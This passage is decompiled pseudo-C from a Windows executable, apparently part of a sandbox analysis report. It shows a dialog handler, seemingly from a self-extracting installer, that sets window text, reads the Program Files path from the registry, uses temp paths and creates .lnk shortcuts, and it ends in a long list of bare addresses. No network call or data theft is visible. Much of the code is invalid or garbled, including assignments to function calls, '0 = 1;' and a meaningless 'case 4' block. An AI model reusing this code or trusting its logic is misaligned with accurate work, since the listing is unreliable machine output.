                                                                                                                                                      									__eflags = _v9;
                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                      										__esi =  &_a8;
                                                                                                                                                      										__edi = E0040B7BA( &_a8, __eflags);
                                                                                                                                                      									} else {
                                                                                                                                                      										__edi =  &_v7224;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = __bl;
                                                                                                                                                      									if(__bl == 0) {
                                                                                                                                                      										__esi = E0040A384(__ecx,  *0x41a81c);
                                                                                                                                                      									} else {
                                                                                                                                                      										__esi = 0;
                                                                                                                                                      									}
                                                                                                                                                      									E0040A384(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                      									__eax = E0040A224( *0x41a81c, __eax);
                                                                                                                                                      									 *0x41a81c = __eax;
                                                                                                                                                      									__eflags = __bl;
                                                                                                                                                      									if(__bl != 0) {
                                                                                                                                                      										 *__eax = 0;
                                                                                                                                                      									}
                                                                                                                                                      									__eax = E0040A5E2(__eax, __edi);
                                                                                                                                                      									__eflags = _v9;
                                                                                                                                                      									if(_v9 == 0) {
                                                                                                                                                      										__eax = E0040A205(__edi);
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								goto L155;
                                                                                                                                                      							case 2:
                                                                                                                                                      								__eflags = _a12;
                                                                                                                                                      								if(_a12 == 0) {
                                                                                                                                                      									 &_v7224 = SetWindowTextA(_a4,  &_v7224); // executed
                                                                                                                                                      								}
                                                                                                                                                      								goto L155;
                                                                                                                                                      							case 3:
                                                                                                                                                      								__eflags = _a12;
                                                                                                                                                      								if(_a12 != 0) {
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags =  *0x419f92;
                                                                                                                                                      								if( *0x419f92 != 0) {
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _v7224 - 0x22;
                                                                                                                                                      								__esi =  &_v7224;
                                                                                                                                                      								_v1080 = 0;
                                                                                                                                                      								if(_v7224 == 0x22) {
                                                                                                                                                      									__esi =  &_v7223;
                                                                                                                                                      								}
                                                                                                                                                      								__eax = E0040A384(__ecx, __esi);
                                                                                                                                                      								__eflags = __eax - 0x400;
                                                                                                                                                      								if(__eax >= 0x400) {
                                                                                                                                                      									goto L155;
                                                                                                                                                      								} else {
                                                                                                                                                      									__al = __esi->i;
                                                                                                                                                      									__eflags = __al - 0x2e;
                                                                                                                                                      									if(__al != 0x2e) {
                                                                                                                                                      										L59:
                                                                                                                                                      										__eflags = __al - 0x5c;
                                                                                                                                                      										if(__al == 0x5c) {
                                                                                                                                                      											L53:
                                                                                                                                                      											 &_v1080 = E0040A477( &_v1080, __esi);
                                                                                                                                                      											L54:
                                                                                                                                                      											__eax =  &_v1080;
                                                                                                                                                      											__eax = E0040A3D9(__ecx,  &_v1080, 0x22);
                                                                                                                                                      											__eflags = __eax;
                                                                                                                                                      											if(__eax != 0) {
                                                                                                                                                      												__eflags =  *((char*)(__eax + 1));
                                                                                                                                                      												if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                      													 *__eax = 0;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      											 &_v1080 = E0040A477(__ebx,  &_v1080);
                                                                                                                                                      											 &_v1080 = E0040B9B0(__esi,  &_v1080); // executed
                                                                                                                                                      											__esi = GetDlgItem(_a4, 0x65);
                                                                                                                                                      											 &_v1080 = SetWindowTextA(__esi,  &_v1080); // executed
                                                                                                                                                      											__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                      											__eax =  &_v1080;
                                                                                                                                                      											__eax = E0040A4E9(__ebx,  &_v1080);
                                                                                                                                                      											__eflags = __eax;
                                                                                                                                                      											if(__eax != 0) {
                                                                                                                                                      												 &_v1080 = SendMessageA(__esi, 0x143, 0,  &_v1080);
                                                                                                                                                      											}
                                                                                                                                                      											goto L155;
                                                                                                                                                      										}
                                                                                                                                                      										__eflags = __al;
                                                                                                                                                      										if(__al == 0) {
                                                                                                                                                      											L62:
                                                                                                                                                      											__eax =  &_v20;
                                                                                                                                                      											__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v20);
                                                                                                                                                      											__eflags = __eax;
                                                                                                                                                      											if(__eax == 0) {
                                                                                                                                                      												 &_v16 =  &_v1080;
                                                                                                                                                      												__eax =  &_v24;
                                                                                                                                                      												_v16 = 0x400;
                                                                                                                                                      												RegQueryValueExA(_v20, "ProgramFilesDir", 0,  &_v24,  &_v1080,  &_v16) = RegCloseKey(_v20);
                                                                                                                                                      											}
                                                                                                                                                      											__eflags = _v1080;
                                                                                                                                                      											if(_v1080 != 0) {
                                                                                                                                                      												__eax =  &_v1080;
                                                                                                                                                      												__eax = E0040A384(__ecx,  &_v1080);
                                                                                                                                                      												__ecx =  &_v1080;
                                                                                                                                                      												__ecx =  &_v1080 - 1;
                                                                                                                                                      												__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                      												if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                      													 &_v1080 = E0040A5E2( &_v1080, "\\");
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      											__edi = E0040A384(__ecx, __esi);
                                                                                                                                                      											__eax =  &_v1080;
                                                                                                                                                      											__edi = __edi + E0040A384(__ecx,  &_v1080);
                                                                                                                                                      											__eflags = __edi - 0x3ff;
                                                                                                                                                      											if(__edi < 0x3ff) {
                                                                                                                                                      												 &_v1080 = E0040A5E2( &_v1080, __esi);
                                                                                                                                                      											}
                                                                                                                                                      											goto L54;
                                                                                                                                                      										}
                                                                                                                                                      										__eflags = __esi->i - 0x3a;
                                                                                                                                                      										if(__esi->i == 0x3a) {
                                                                                                                                                      											goto L53;
                                                                                                                                                      										}
                                                                                                                                                      										goto L62;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = __esi->i - 0x5c;
                                                                                                                                                      									if(__esi->i != 0x5c) {
                                                                                                                                                      										goto L59;
                                                                                                                                                      									}
                                                                                                                                                      									__esi =  &(__esi->i);
                                                                                                                                                      									__eflags = __esi;
                                                                                                                                                      									goto L53;
                                                                                                                                                      								}
                                                                                                                                                      							case 4:
                                                                                                                                                      								__eflags =  *0x419f8c - 1;
                                                                                                                                                      								__eflags = __eax - 0x419f8c;
                                                                                                                                                      								 *__edi =  *__edi + __ecx;
                                                                                                                                                      								__eflags = _a1 & __cl;
                                                                                                                                                      								 *__eax =  *__eax + __al;
                                                                                                                                                      								__eflags =  *__eax;
                                                                                                                                                      							case 5:
                                                                                                                                                      								__eax = _v7224;
                                                                                                                                                      								__eax = _v7224;
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax == 0) {
                                                                                                                                                      									L81:
                                                                                                                                                      									 *0x419edf = 0;
                                                                                                                                                      									 *0x419ede = 1;
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								__eax = __eax - 0x30;
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax == 0) {
                                                                                                                                                      									 *0x419edf = 0;
                                                                                                                                                      									L80:
                                                                                                                                                      									 *0x419ede = 0;
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								__eax = __eax - 1;
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax == 0) {
                                                                                                                                                      									goto L81;
                                                                                                                                                      								}
                                                                                                                                                      								__eax = __eax - 1;
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax != 0) {
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								 *0x419edf = 1;
                                                                                                                                                      								goto L80;
                                                                                                                                                      							case 6:
                                                                                                                                                      								__eflags = _a12 - 4;
                                                                                                                                                      								if(_a12 != 4) {
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								_push(0);
                                                                                                                                                      								goto L89;
                                                                                                                                                      							case 7:
                                                                                                                                                      								__eflags = _a12 - 1;
                                                                                                                                                      								if(_a12 != 1) {
                                                                                                                                                      									L106:
                                                                                                                                                      									__eflags = _a12 - 7;
                                                                                                                                                      									if(_a12 == 7) {
                                                                                                                                                      										__eflags =  *0x419f8c;
                                                                                                                                                      										if( *0x419f8c == 0) {
                                                                                                                                                      											 *0x419f8c = 2;
                                                                                                                                                      										}
                                                                                                                                                      										 *0x419f88 = 1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								 &_v3128 = GetTempPathA(0x400,  &_v3128);
                                                                                                                                                      								 &_v3128 = E004076C8( &_v3128);
                                                                                                                                                      								_v8 = _v8 & 0x00000000;
                                                                                                                                                      								_push(0);
                                                                                                                                                      								__ebx = "%s%s%d";
                                                                                                                                                      								while(1) {
                                                                                                                                                      									_push( *0x41409c);
                                                                                                                                                      									__eax =  &_v3128;
                                                                                                                                                      									_push( &_v3128);
                                                                                                                                                      									__eax =  &_v2104;
                                                                                                                                                      									_push(__ebx);
                                                                                                                                                      									_push( &_v2104);
                                                                                                                                                      									__eax =  *__edi();
                                                                                                                                                      									__esp = __esp + 0x14;
                                                                                                                                                      									__eax =  &_v2104;
                                                                                                                                                      									_push( &_v2104);
                                                                                                                                                      									__eax = __esi->i();
                                                                                                                                                      									__eflags = __eax - 0xffffffff;
                                                                                                                                                      									if(__eax == 0xffffffff) {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									_t134 =  &_v8;
                                                                                                                                                      									 *_t134 = _v8 + 1;
                                                                                                                                                      									__eflags =  *_t134;
                                                                                                                                                      									_push(_v8);
                                                                                                                                                      								}
                                                                                                                                                      								 &_v2104 = SetDlgItemTextA(_a4, 0x65,  &_v2104);
                                                                                                                                                      								__eflags = _v7224;
                                                                                                                                                      								if(_v7224 == 0) {
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags =  *0x41a816;
                                                                                                                                                      								if( *0x41a816 != 0) {
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								__eax =  &_v7224;
                                                                                                                                                      								_v568 = 0;
                                                                                                                                                      								__eax = E0040A3AD( &_v7224, 0x2c);
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax != 0) {
                                                                                                                                                      									L102:
                                                                                                                                                      									__eflags = _v568;
                                                                                                                                                      									if(_v568 == 0) {
                                                                                                                                                      										 &_v46304 =  &_v7224;
                                                                                                                                                      										E0040A477( &_v7224,  &_v46304) =  &_v42208;
                                                                                                                                                      										 &_v568 = E0040A477( &_v568,  &_v42208);
                                                                                                                                                      									}
                                                                                                                                                      									 &_v7224 = E0040ABA1( &_v7224);
                                                                                                                                                      									 &_v568 =  &_v7224;
                                                                                                                                                      									_v5176 = 0;
                                                                                                                                                      									__eax = MessageBoxA(_a4,  &_v7224,  &_v568, 0x24);
                                                                                                                                                      									__eflags = __eax - 6;
                                                                                                                                                      									if(__eax == 6) {
                                                                                                                                                      										goto L155;
                                                                                                                                                      									} else {
                                                                                                                                                      										0 = 1;
                                                                                                                                                      										__eflags = 1;
                                                                                                                                                      										 *0x41a815 = 1;
                                                                                                                                                      										 *0x419f78 = 1;
                                                                                                                                                      										__eax = EndDialog(_a4, 1);
                                                                                                                                                      										goto L106;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								__esi = 0;
                                                                                                                                                      								__eflags = _v7224;
                                                                                                                                                      								if(_v7224 == 0) {
                                                                                                                                                      									goto L102;
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L98;
                                                                                                                                                      								}
                                                                                                                                                      								while(1) {
                                                                                                                                                      									L98:
                                                                                                                                                      									__eflags =  *((char*)(__ebp + __esi - 0x1c34)) - 0x40;
                                                                                                                                                      									if( *((char*)(__ebp + __esi - 0x1c34)) == 0x40) {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									__esi =  &(__esi->i);
                                                                                                                                                      									__eflags =  *((char*)(__ebp + __esi - 0x1c34));
                                                                                                                                                      									if( *((char*)(__ebp + __esi - 0x1c34)) != 0) {
                                                                                                                                                      										continue;
                                                                                                                                                      									}
                                                                                                                                                      									goto L102;
                                                                                                                                                      								}
                                                                                                                                                      								__ebp + __esi - 0x1c33 =  &_v568;
                                                                                                                                                      								__eax = E0040A477( &_v568, __ebp + __esi - 0x1c33);
                                                                                                                                                      								 *((char*)(__ebp + __esi - 0x1c34)) = 0;
                                                                                                                                                      								goto L102;
                                                                                                                                                      							case 8:
                                                                                                                                                      								__eflags = _a12 - 3;
                                                                                                                                                      								if(_a12 == 3) {
                                                                                                                                                      									__eflags = _v7224;
                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                      										 &_v7224 = SetWindowTextA(_a4,  &_v7224);
                                                                                                                                                      									}
                                                                                                                                                      									__esi =  &_a8;
                                                                                                                                                      									 *0x41a820 = E0040B7BA(__esi, __eflags);
                                                                                                                                                      								}
                                                                                                                                                      								 *0x41a817 = 1;
                                                                                                                                                      								goto L155;
                                                                                                                                                      							case 9:
                                                                                                                                                      								__eflags = _a12 - 5;
                                                                                                                                                      								if(_a12 != 5) {
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								_push(1);
                                                                                                                                                      								L89:
                                                                                                                                                      								 &_v7224 = E0040BD80( &_v7224, __ecx); // executed
                                                                                                                                                      								goto L155;
                                                                                                                                                      							case 0xa:
                                                                                                                                                      								__eflags = _a12 - 6;
                                                                                                                                                      								if(_a12 != 6) {
                                                                                                                                                      									goto L155;
                                                                                                                                                      								}
                                                                                                                                                      								__eax = _v46304;
                                                                                                                                                      								__eax = E0040A250(__ecx, _v46304);
                                                                                                                                                      								__eax = __eax - 0x50;
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax == 0) {
                                                                                                                                                      									_v8 = 2;
                                                                                                                                                      								} else {
                                                                                                                                                      									__eax = __eax - 3;
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax == 0) {
                                                                                                                                                      										_v8 = 0xb;
                                                                                                                                                      									} else {
                                                                                                                                                      										__eax = __eax - 1;
                                                                                                                                                      										__eflags = __eax;
                                                                                                                                                      										if(__eax == 0) {
                                                                                                                                                      											_v8 = 7;
                                                                                                                                                      										} else {
                                                                                                                                                      											_v8 = 0x10;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								 &_v42208 =  &_v3128;
                                                                                                                                                      								_v8248 = 0;
                                                                                                                                                      								_v2104 = 0;
                                                                                                                                                      								__eax = E0040A477( &_v3128,  &_v42208);
                                                                                                                                                      								__eflags = _v3128 - 0x22;
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									 &_v3128 = E00405767(__eflags,  &_v3128, 0);
                                                                                                                                                      									__eflags = __al;
                                                                                                                                                      									if(__al != 0) {
                                                                                                                                                      										goto L142;
                                                                                                                                                      									}
                                                                                                                                                      									__edi = 0;
                                                                                                                                                      									__eflags = _v3128;
                                                                                                                                                      									__esi =  &_v3128;
                                                                                                                                                      									if(_v3128 == 0) {
                                                                                                                                                      										goto L142;
                                                                                                                                                      									} else {
                                                                                                                                                      										goto L130;
                                                                                                                                                      									}
                                                                                                                                                      									do {
                                                                                                                                                      										L130:
                                                                                                                                                      										__bl = __esi->i;
                                                                                                                                                      										__eflags = __bl - 0x20;
                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                      											L132:
                                                                                                                                                      											__eax =  &_v3128;
                                                                                                                                                      											__esi->i = 0;
                                                                                                                                                      											__eax = E00405767(__eflags,  &_v3128, 0);
                                                                                                                                                      											__eflags = __al;
                                                                                                                                                      											if(__al == 0) {
                                                                                                                                                      												__esi->i = __bl;
                                                                                                                                                      												goto L139;
                                                                                                                                                      											}
                                                                                                                                                      											__edi = __esi;
                                                                                                                                                      											__eflags = __bl - 0x2f;
                                                                                                                                                      											if(__bl != 0x2f) {
                                                                                                                                                      												do {
                                                                                                                                                      													__esi =  &(__esi->i);
                                                                                                                                                      													__eflags = __esi->i - 0x20;
                                                                                                                                                      												} while (__esi->i == 0x20);
                                                                                                                                                      												_push(__esi);
                                                                                                                                                      												__eax =  &_v2104;
                                                                                                                                                      												L137:
                                                                                                                                                      												_push(__eax);
                                                                                                                                                      												__eax = E0040A477();
                                                                                                                                                      												 *__edi = __bl;
                                                                                                                                                      												goto L139;
                                                                                                                                                      											}
                                                                                                                                                      											_t192 =  &(__esi->i); // 0x1
                                                                                                                                                      											__eax = _t192;
                                                                                                                                                      											_push(_t192);
                                                                                                                                                      											_v2104 = __bl;
                                                                                                                                                      											__eax =  &_v2103;
                                                                                                                                                      											goto L137;
                                                                                                                                                      										}
                                                                                                                                                      										__eflags = __bl - 0x2f;
                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                      											goto L139;
                                                                                                                                                      										}
                                                                                                                                                      										goto L132;
                                                                                                                                                      										L139:
                                                                                                                                                      										__esi =  &(__esi->i);
                                                                                                                                                      										__eflags = __esi->i;
                                                                                                                                                      									} while (__esi->i != 0);
                                                                                                                                                      									__eflags = __edi;
                                                                                                                                                      									if(__edi != 0) {
                                                                                                                                                      										 *__edi = 0;
                                                                                                                                                      									}
                                                                                                                                                      									goto L142;
                                                                                                                                                      								} else {
                                                                                                                                                      									 &_v42207 =  &_v3128;
                                                                                                                                                      									E0040A477( &_v3128,  &_v42207) =  &_v3127;
                                                                                                                                                      									__eax = E004073AB( &_v3127, 0x22);
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax != 0) {
                                                                                                                                                      										 *__eax = 0;
                                                                                                                                                      										 &_v2104 = E0040A477( &_v2104,  &_v2104);
                                                                                                                                                      									}
                                                                                                                                                      									L142:
                                                                                                                                                      									__eflags = _v25824;
                                                                                                                                                      									if(_v25824 != 0) {
                                                                                                                                                      										 &_v8248 =  &_v25824;
                                                                                                                                                      										__eax = E00405822( &_v25824,  &_v8248);
                                                                                                                                                      									}
                                                                                                                                                      									 &_v17632 =  &_v3128;
                                                                                                                                                      									E00405822( &_v3128,  &_v17632) =  &_v1080;
                                                                                                                                                      									__eax = E0040AAC2(__ecx,  &_v1080, _v8); // executed
                                                                                                                                                      									 &_v1080 = E004076C8( &_v1080);
                                                                                                                                                      									__eflags = _v38112;
                                                                                                                                                      									if(_v38112 != 0) {
                                                                                                                                                      										 &_v38112 =  &_v1080;
                                                                                                                                                      										E0040A5E2( &_v1080,  &_v38112) =  &_v1080;
                                                                                                                                                      										__eax = E004076C8( &_v1080);
                                                                                                                                                      									}
                                                                                                                                                      									 &_v1080 =  &_v13528;
                                                                                                                                                      									__eax = E0040A477( &_v13528,  &_v1080);
                                                                                                                                                      									__eflags = _v29920;
                                                                                                                                                      									__eax =  &_v29920;
                                                                                                                                                      									if(_v29920 == 0) {
                                                                                                                                                      										__eax =  &_v42208;
                                                                                                                                                      									}
                                                                                                                                                      									 &_v1080 = E0040A5E2( &_v1080,  &_v1080);
                                                                                                                                                      									__eax =  &_v1080;
                                                                                                                                                      									__eax = E00407690( &_v1080);
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      									if(__eax == 0) {
                                                                                                                                                      										L150:
                                                                                                                                                      										 &_v1080 = E0040A5E2( &_v1080, ".lnk");
                                                                                                                                                      										goto L151;
                                                                                                                                                      									} else {
                                                                                                                                                      										__eax = E0040A59A(__eax, ".lnk");
                                                                                                                                                      										__eflags = __eax;
                                                                                                                                                      										if(__eax == 0) {
                                                                                                                                                      											L151:
                                                                                                                                                      											 &_v1080 = E004058FF(__ebx, __esi,  &_v1080, 0, 1); // executed
                                                                                                                                                      											_v2104 =  ~_v2104;
                                                                                                                                                      											asm("sbb eax, eax");
                                                                                                                                                      											__ecx =  &_v2104;
                                                                                                                                                      											 ~_v2104 &  &_v2104 = _v8248;
                                                                                                                                                      											__eax =  ~_v8248;
                                                                                                                                                      											asm("sbb eax, eax");
                                                                                                                                                      											__ecx =  &_v8248;
                                                                                                                                                      											 ~_v8248 &  &_v8248 = _v34016;
                                                                                                                                                      											__eax =  ~_v34016;
                                                                                                                                                      											asm("sbb eax, eax");
                                                                                                                                                      											__ecx =  &_v34016;
                                                                                                                                                      											 ~_v34016 &  &_v34016 =  &_v1080;
                                                                                                                                                      											 &_v17632 = E0040A9BD( &_v17632,  &_v1080,  ~_v34016 &  &_v34016,  ~_v8248 &  &_v8248,  ~_v2104 &  &_v2104); // executed
                                                                                                                                                      											__eflags = _v13528;
                                                                                                                                                      											if(_v13528 != 0) {
                                                                                                                                                      												__eax =  &_v13528;
                                                                                                                                                      												SHChangeNotify(0x1000, 1,  &_v13528, 0); // executed
                                                                                                                                                      											}
                                                                                                                                                      											goto L155;
                                                                                                                                                      										}
                                                                                                                                                      										goto L150;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							case 0xb:
                                                                                                                                                      								__eflags = _a12 - 7;
                                                                                                                                                      								if(_a12 == 7) {
                                                                                                                                                      									 *0x419f90 = 1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L155;
                                                                                                                                                      							case 0xc:
                                                                                                                                                      								__eax = _v7224;
                                                                                                                                                      								__eax = E0040A250(__ecx, _v7224);
                                                                                                                                                      								__eflags = __eax - 0x46;
                                                                                                                                                      								if(__eax == 0x46) {
                                                                                                                                                      									 *0x419edd = 1;
                                                                                                                                                      								} else {
                                                                                                                                                      									__eflags = __eax - 0x55;
                                                                                                                                                      									if(__eax == 0x55) {
                                                                                                                                                      										 *0x419edc = 1;
                                                                                                                                                      									} else {
                                                                                                                                                      										 *0x419edd = 0;
                                                                                                                                                      										 *0x419edc = 0;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								goto L155;
                                                                                                                                                      						}
                                                                                                                                                      						L4:
                                                                                                                                                      						E0040A925( &_v7224, _v8);
                                                                                                                                                      						_v8 = _v8 + 0x1000;
                                                                                                                                                      						_t15 =  &_v16;
                                                                                                                                                      						 *_t15 = _v16 - 1;
                                                                                                                                                      						if( *_t15 != 0) {
                                                                                                                                                      							goto L4;
                                                                                                                                                      						} else {
                                                                                                                                                      							_v8 = _v8 & 0x00000000;
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      						L155:
                                                                                                                                                      						_t240 = E0040B613(0x1000, _t323, _a8,  &_v21728,  &_v7224,  &_v9,  &_a11);
                                                                                                                                                      						_a8 = _t240;
                                                                                                                                                      					} while (_t240 != 0);
                                                                                                                                                      					goto L157;
                                                                                                                                                      				}
                                                                                                                                                      			}





































                                                                                                                                                      0x0040bf99
                                                                                                                                                      0x0040bfa1
                                                                                                                                                      0x0040bfaa
                                                                                                                                                      0x0040ca5c
                                                                                                                                                      0x0040ca5c
                                                                                                                                                      0x0040bfcf
                                                                                                                                                      0x0040bfd4
                                                                                                                                                      0x0040bfd9
                                                                                                                                                      0x0040ca5a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bfdf
                                                                                                                                                      0x0040bfe0
                                                                                                                                                      0x0040bfe1
                                                                                                                                                      0x0040bfe1
                                                                                                                                                      0x0040bffe
                                                                                                                                                      0x0040c001
                                                                                                                                                      0x0040c001
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c021
                                                                                                                                                      0x0040c03c
                                                                                                                                                      0x0040c043
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c045
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c045
                                                                                                                                                      0x0040c043
                                                                                                                                                      0x0040c04e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c057
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c05e
                                                                                                                                                      0x0040c062
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c074
                                                                                                                                                      0x0040c088
                                                                                                                                                      0x0040c094
                                                                                                                                                      0x0040c0a7
                                                                                                                                                      0x0040c0b2
                                                                                                                                                      0x0040c0c4
                                                                                                                                                      0x0040c0cf
                                                                                                                                                      0x0040c0d4
                                                                                                                                                      0x0040c0dd
                                                                                                                                                      0x0040c0e3
                                                                                                                                                      0x0040c0e8
                                                                                                                                                      0x0040c0ea
                                                                                                                                                      0x0040c256
                                                                                                                                                      0x0040c25c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c0f0
                                                                                                                                                      0x0040c0f0
                                                                                                                                                      0x0040c0f5
                                                                                                                                                      0x0040c0fe
                                                                                                                                                      0x0040c104
                                                                                                                                                      0x0040c10b
                                                                                                                                                      0x0040c1bb
                                                                                                                                                      0x0040c1c2
                                                                                                                                                      0x0040c1c4
                                                                                                                                                      0x0040c1c7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1d0
                                                                                                                                                      0x0040c1d6
                                                                                                                                                      0x0040c1d8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1da
                                                                                                                                                      0x0040c1da
                                                                                                                                                      0x0040c1dd
                                                                                                                                                      0x0040c1de
                                                                                                                                                      0x0040c1e6
                                                                                                                                                      0x0040c1f5
                                                                                                                                                      0x0040c1f7
                                                                                                                                                      0x0040c201
                                                                                                                                                      0x0040c203
                                                                                                                                                      0x0040c206
                                                                                                                                                      0x0040c1e0
                                                                                                                                                      0x0040c1e0
                                                                                                                                                      0x0040c1e0
                                                                                                                                                      0x0040c1e3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c208
                                                                                                                                                      0x0040c216
                                                                                                                                                      0x0040c21c
                                                                                                                                                      0x0040c21e
                                                                                                                                                      0x0040c220
                                                                                                                                                      0x0040c225
                                                                                                                                                      0x0040c227
                                                                                                                                                      0x0040c234
                                                                                                                                                      0x0040c234
                                                                                                                                                      0x0040c227
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c21e
                                                                                                                                                      0x0040c206
                                                                                                                                                      0x0040c1d8
                                                                                                                                                      0x0040c116
                                                                                                                                                      0x0040c119
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c12d
                                                                                                                                                      0x0040c139
                                                                                                                                                      0x0040c145
                                                                                                                                                      0x0040c14a
                                                                                                                                                      0x0040c14d
                                                                                                                                                      0x0040c150
                                                                                                                                                      0x0040c163
                                                                                                                                                      0x0040c16c
                                                                                                                                                      0x0040c171
                                                                                                                                                      0x0040c173
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c179
                                                                                                                                                      0x0040c187
                                                                                                                                                      0x0040c195
                                                                                                                                                      0x0040c19a
                                                                                                                                                      0x0040c19c
                                                                                                                                                      0x0040c19d
                                                                                                                                                      0x0040c1a7
                                                                                                                                                      0x0040c1ae
                                                                                                                                                      0x0040c1b5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c1b5
                                                                                                                                                      0x0040c159
                                                                                                                                                      0x0040c15e
                                                                                                                                                      0x0040c161
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c23a
                                                                                                                                                      0x0040c23a
                                                                                                                                                      0x0040c243
                                                                                                                                                      0x0040c249
                                                                                                                                                      0x0040c24e
                                                                                                                                                      0x0040c24e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c0f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c266
                                                                                                                                                      0x0040c26a
                                                                                                                                                      0x0040c270
                                                                                                                                                      0x0040c275
                                                                                                                                                      0x0040c277
                                                                                                                                                      0x0040c27a
                                                                                                                                                      0x0040c27c
                                                                                                                                                      0x0040c284
                                                                                                                                                      0x0040c284
                                                                                                                                                      0x0040c289
                                                                                                                                                      0x0040c28d
                                                                                                                                                      0x0040c297
                                                                                                                                                      0x0040c29f
                                                                                                                                                      0x0040c28f
                                                                                                                                                      0x0040c28f
                                                                                                                                                      0x0040c28f
                                                                                                                                                      0x0040c2a1
                                                                                                                                                      0x0040c2a3
                                                                                                                                                      0x0040c2b4
                                                                                                                                                      0x0040c2a5
                                                                                                                                                      0x0040c2a5
                                                                                                                                                      0x0040c2a5
                                                                                                                                                      0x0040c2bc
                                                                                                                                                      0x0040c2c7
                                                                                                                                                      0x0040c2cc
                                                                                                                                                      0x0040c2d1
                                                                                                                                                      0x0040c2d3
                                                                                                                                                      0x0040c2d5
                                                                                                                                                      0x0040c2d5
                                                                                                                                                      0x0040c2da
                                                                                                                                                      0x0040c2df
                                                                                                                                                      0x0040c2e3
                                                                                                                                                      0x0040c2ea
                                                                                                                                                      0x0040c2ea
                                                                                                                                                      0x0040c2e3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c2f4
                                                                                                                                                      0x0040c2f8
                                                                                                                                                      0x0040c308
                                                                                                                                                      0x0040c308
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c313
                                                                                                                                                      0x0040c317
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c31d
                                                                                                                                                      0x0040c324
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c32a
                                                                                                                                                      0x0040c331
                                                                                                                                                      0x0040c337
                                                                                                                                                      0x0040c33e
                                                                                                                                                      0x0040c340
                                                                                                                                                      0x0040c340
                                                                                                                                                      0x0040c347
                                                                                                                                                      0x0040c34c
                                                                                                                                                      0x0040c351
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c357
                                                                                                                                                      0x0040c357
                                                                                                                                                      0x0040c359
                                                                                                                                                      0x0040c35b
                                                                                                                                                      0x0040c408
